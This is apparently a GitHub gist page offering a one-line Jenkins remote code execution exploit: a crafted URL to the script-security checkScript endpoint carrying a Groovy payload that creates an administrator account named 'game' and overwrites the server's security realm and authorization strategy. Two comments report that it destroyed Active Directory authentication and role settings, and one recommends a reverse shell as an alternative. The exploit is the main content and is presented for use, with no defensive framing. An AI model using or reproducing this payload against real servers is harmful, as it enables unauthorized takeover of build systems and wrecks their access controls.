Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Jenkins Metaprogramming RCE Create new user
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}
@ilatypov

This comment has been minimized.

Copy link

@ilatypov ilatypov commented Aug 1, 2019

In addition to creating a privileged account, this disabled Active Directory authentication and destroyed the role-based configuration for Active Directory groups vs. Jenkins folders.

@gquere

This comment has been minimized.

Copy link

@gquere gquere commented Aug 8, 2019

This will work but will also absolutely trash the whole security configuration! Use with caution!
If applicable, prefer the use of a Groovy/Bash reverse shell.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment